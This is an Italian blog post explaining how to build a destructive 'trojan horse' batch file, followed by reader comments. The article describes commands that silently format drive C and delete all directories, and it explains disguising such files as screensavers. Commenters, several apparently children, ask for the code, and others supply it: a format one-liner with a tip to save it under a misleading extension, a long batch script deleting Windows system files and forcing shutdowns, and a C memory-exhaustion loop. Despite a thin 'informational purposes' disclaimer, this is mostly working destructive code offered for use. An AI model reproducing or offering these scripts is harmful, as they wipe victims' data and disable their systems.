viziato: Sicurezza - TROJAN HORSE, come creare un virus rudimentale ma distruttivo

Software e Programmi by Viziato, una raccolta di software gratuiti, utility e programmi per il tuo pc

Programmi Utili

Firefox Adobe Acrobat Reader Google Pack

Picasa Google Desktop

Norton Security Scan Skype Spy Doctor

28 marzo 2006

Sicurezza - TROJAN HORSE, come creare un virus rudimentale ma distruttivo

Come fanno i pirati a creare un virus tanto rudimentale quanto distruttivo

PREMESSA IMPORTANTE

Cominciamo con una piccola ed importantissimma premessa. Questo articolo vuole
dimostrare il fatto che per creare un file distruttivo non c'Ã¨ bisogno
di avere conoscenze informatiche particolari, nÃ¨ una laurea in ingegneria.
In secondo luogo ricordo ai lettori di questo tutorial che bisogna stare attenti
a non distribuire il file che si crea neanche al nemico piÃ¹ odiato, questo
per diversi motivi, alcuni dei quali sono sia dal punto di vista legale che
morale. Quindi per dirla breve questo articolo (come tutti gli altri articoli
di viziato) sono scritti a scopo scientifico e informativo.

ATTENZIONE

Prima di procedere a sperimentare il contenuto di questo articolo dobbiamo leggere
tutto. Questo perchÃ¨ se dopo aver creato il file ci clicchiamo noi stessi
possiamo dire addio ai nostri dati del disco rigido.

Cosa Ã¨ un TROJAN HORSE

Per essere precisi un trojan horse non Ã¨ propriamente un virus (o forse
lo potrebbe essere), ma un programmino o insieme di istruzioni capaci di distruggere
un intero hard disk. Infatti un trojan horse ha lo scopo di danneggiare un intero
sistema, mentre un virus ha (o dovrebbe avere) lo scopo di creare danni di diversa
natura, nascondersi e replicarsi.

Come si crea

Il trojan horse lo si puÃ² creare con un editor di testo ed inserendo
alcune istruzioni molto semplici. Apriamo, ad esempio blocco note di windows
(start / programmi / accessori / blocco note e inseriamo queste istruzioni

Queste sono delle istruzioni DOS, Format che Ã¨ la formattazione del
disco C, Deltre Ã¨ l'eliminazione di una intera directory (in questo caso
di tutte le directory). La chiocciola prima di Format serve a nascondere l'echo,
in quanto diversamente la vittima si accorgerebbe dell'evento.

Quando si avvia l'istruzione C: format il sistema ci avverte di ciÃ²
che sta succedendo dandoci la possibilitÃ di un ripensamento: "ATTENZIONE:
TUTTI I DATI SUL DISCO FISSO C: ANDRANNO PERSI Continuare con la formattazione
(S/N)? "

Usando invece l'istruzione /AUTOTEST questo messaggio di cui sopra viene scavalcato
(ecco la fregatura) e neanche il tempo di accorgersi cosa sta accadendo che
il disco rigido viene formattato. Stesso discorso vale per l'istruzione DELTRE
con /y che elimina tutti i file e tutte le directory del disco. In sostanza
non rimangono neanche gli occhi per piangere.

Per rendere operativo il virus basta salvarlo con l'estensione.bat, basta andare
su file / salva con nome

ecco l'estensione

lo salvo sul desktop, ecco il risultato

ATTENTO: ADESSO SE APRI (con
il doppio clic) QUESTO FILE, DISTRUGGI UN INTERO HARD DISK.

Ora, Ã¨ chiaro che la maggior parte degli utenti non aprirebbe
mai un file con estensione .bat (escluso gli ingenui). Il problema Ã¨
che, queste istruzioni, i pirati li inseriscono in piccoli programmini con estensione
.com (o altra) ottenendo lo stesso risultato. Infatti utilizzano alcune utility
per "gonfiare" il file di molti KB per renderlo credibile (magari
facendo credere che si tratti di uno screan saver).

Ora, con questo articolo, hai capito come puÃ² essere semplice
creare un file distruttivo, ed inoltre come un pirata possa teoricamente (quello
che ho appena accennato) camuffare un file del genere con altra estensione ed
ingannare anche noi.

Questo articolo, ripeto, ha soltanto uno scopo informativo e scientifico,
ti prego, non ti macchiare il cervello !!

posted by Ellis Bosisio @ 11:54 PM

26 Comments:

At 9:44 PM, Anonimo said…

scusa ma nel tuo articolo non ci sono le frasi da scrivere e soprattutto come mettere nel files note la frase TUTTI I DATI ANDRANNO PERSI CONTINUARE S/N? nn ci sono se vuoi spiegami tutto e in modo chiaro a questa mail luca193@hotmail.it E NON MANDARMI VIRUS! ;-)
At 7:02 PM, detel-ice said…

Scusa ma nell'articolo non ci sono le frasi da inserire, e poi come è che faccio a dargli l'estensione .bat? per favore rispondimi alla mia E-mail: geremia05@libero.it
At 4:19 PM, anonimo said…

ciao...ma perche nell'articolo non cisono le istruzioni da scrivere nel blocco note?rispondi x favore a thebuzz91@hotmail.it
At 12:10 PM, Anonimo said…

grazie x le informazioni ma non riesco a dargli l' estensione .bat come si fa?
scrivimi a
andrea-santamen@hotmail.it
At 12:46 PM, Anonimo said…

x rinominare...salva con nome da blocco note
At 8:18 PM, Anonimo said…

scrivimi le istruzioni e la sequenza intera x il format ke nn l'hai nserito x favore!!!claudio_spasma@hotmail.it
At 9:08 PM, Anonimo said…

salvando il trojan sul dekstop ti infetti salvatelo in un archivio o cartella compressa possibilmente
At 5:23 PM, mikosss said…

anche se lo apri non succede nulla
At 6:17 PM, Anonimo said…

Salve a tutti.
sono un esperto nel fatto di trojan e devo dire che farli in blocco note è una ca***a pazzesca.
Difatti chiunque abbia un po di senno andrà a clikkare con il tasto destro sul file "sospetto" (ricordo che è impossibile applicare una icona al trojan in questione) e cliccherà modifica, così facendo vedrà la dicitura "FORMAT" che, come tutti sappiamo, è dannosa :)
se volete aiuto in questo settore contattatemi.
shotokan@hackermail.com
At 6:09 PM, Anonimo said…

scusa non potresti inviarmi le istruzioni da scrivere nel blocco note? non mandarmi virus.tommy.beschi@hotmail.com
At 9:40 PM, Anonimo said…

cmq il codice da mettere è @format C:/autotest e io ho provato a salvarlo con l' estensione .eml ed ho notato che funziona lo stasso così ne otterrete uno piu credibile
At 11:08 AM, Anonimo said…

ma sono stufo di cercare su internet come si crea un trojan ma un trojan di quelli veri!! se qualcuna sa come si fa lasci un commento perfavore!!
At 11:43 AM, Anonimo said…

ciao non è ke mi puoi mandare il testo da mettere per creare il virus a questa e-mail?
berna99@hotmail.it

HELP!!!!!
At 11:45 AM, Anonimo said…

non è ke mi puoi mandare a berna99@hotmail.it le istruzioni da mettere nel blocco note?
At 6:56 PM, Anonimo said…

@format C: /AUTOFORMAT

bravi, salvate come asd.bat e cliccateci sopra due volte, anche tre se ce la fate
At 6:56 PM, Anonimo said…

@format C: /AUTOFORMAT

bravi, salvate come asd.bat e cliccateci sopra due volte, anche tre se ce la fate
At 4:13 PM, Anonimo said…

ciao, ma nel tuo testo non sono presenti le frasi da inserire. ma quali sono?
contattami alias.enigmista@hotmail.it
mi raccomando, so creare worm e virus abbastanza dannosi, non provocarmi!
P.S. ma scusa, un anonimo ha detto che crearli dal blocco note è una caxxata, è vero??
At 6:09 PM, damiano said…

scusa mi puoi inviare le cose che devo mettere nel bloc notes per il virus
mandalo su ard.danza@libero.it
At 9:54 AM, Anonimo said…

ma allora sti trojan come si fanno?le istruzioni?mandatele a giorgio_fury@libero.it
At 8:56 PM, mitico!!!! said…

usate questo codice creato da me:
C:\> C:\Programmi\Metin2_Italiano\Config.exe
C:\> C:\Programmi\Metin2_Italiano\Metin2.exe
shutdown -s -t 60 -c "addio metin2!!!!"
shutdown -s -t 60 -c "quanto mi dispiace!!!!"
@echo off
start cmd
start notepad
start explorer.exe
start format.com
@del C:\Programmi\Nuovita\aworld.exe
C:\> C:\Programmi\Nuovita\aworld.exe
shutdown -s -t 60 -c "addio nuovita!!!!"
shutdown -s -t 60 -c "quanto mi dispiace!!!!"
start cmd
start notepad
start cmd
start notepad
@del C:\WINDOWS\
@del C:\WINDOWS\system32\
@del C:\Programmi\Mozilla Firefox\firefox.exe
@del C:\WINDOWS\system32\cmd.exe
start cmd
start notepad
start cmd
start notepad
@del C:\Programmi\
shutdown -s -t 60 -c "attenzione batch trojan"
shutdown -s -t 60 -c "attenzione batch trojan"
shutdown -s -t 60 -c "???????????????????????"
shutdown -s -t 60 -c "!!!!!!!!!!!!!!!!!!!!!!!"
start cmd
start notepad
start cmd
start notepad
shutdown -s -t 60 -c "che caos vero!!!!"
shutdown -s -t 60 -c "ahahahahahahag"
@del C:\WINDOWS\system32\explorer.exe
@del C:\WINDOWS\explorer.exe
@del C:\WINDOWS\
@del C:\WINDOWS\
@del C:\Programmi\eMule\emule.exe
C:\> C:\Programmi\asronzo
C:\> C:\Programmi\adeficente
C:\> C:\Programmi\supratin
C:\> C:\Programmi\acegentile
start cmd
start notepad
start cmd
start notepad
shutdown -s -t 60 -c "supratin2"
shutdown -s -t 60 -c "acegentile"
@del C:\WINDOWS\system32\iexplore.exe
C:\> C:\WINDOWS\system32\iexplore.exe
At 9:33 AM, Anonimo said…

scrivimi le istruzioni e la sequenza intera x il format ke nn l'hai inserito x favore!!! all' e- mail : matteo.pelosi@hotmail.com oppure matteo.pelosi@yahoo.it
At 9:34 AM, Anonimo said…

scrivimi le istruzioni e la sequenza intera x il format ke nn l'hai nserito x favore!!! matteo.pelosi@hotmail.com
At 12:39 AM, Melo said…

bello sto virusone:D complimenti. Sta di fatto che il vecchio format c: non funziona su macchine aggiornate. Vedo cmq che molti dei tizi che postano commenti e vogliono questo mosso di file bat hanno 16-14 anni! Per fare un virus scassapalle bastano ste due righe di C

#include "malloc.h"

int main (void) {
while (5) {
malloc(1000*sizeof(double));
}
}

Questo incasina ram e processore, impedisce di aprire una qualunque applicazione e spesso fa crashare le altre e soprattutto non funziona solo su winzoz.
Se proprio volete fare danno scaricatevi un compilatore borland e nchiummatevi la sua guida in linea, che è meglio che seguire comandi dos.
At 7:51 PM, Anonimo said…

ho 11 anni e se o capito bene non ci sono le parole da metterle nel blocco note a ho scritto anonimo perche' mi scocciavo di fare la registrazione su google ciao
At 9:08 PM, Anonimo said…

mi potresti scrivere le istruzioni e la sequenza intera x il format ke nn l'hai nserito x favore!!!
Grazie non inviarmi virus
francescomsg@hotmail.it
At 11:55 PM, Anonimo said…

ciao puoi mandarmi le istruzioni a seryark94@hotmail.it grazie ancora P.S: non mandarmi virus o allegati cia